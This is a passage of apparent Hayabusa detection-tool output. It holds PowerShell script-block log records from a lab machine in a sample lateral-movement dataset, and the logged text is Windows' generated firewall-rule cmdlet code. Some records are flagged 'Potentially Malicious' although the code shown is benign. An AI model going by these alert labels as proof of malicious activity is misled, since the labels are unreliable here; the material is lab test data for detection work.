$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdlet",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdlet",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetFirewallRule' -Alias '*' function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSet",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetFirewallRule' -Alias '*' function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] 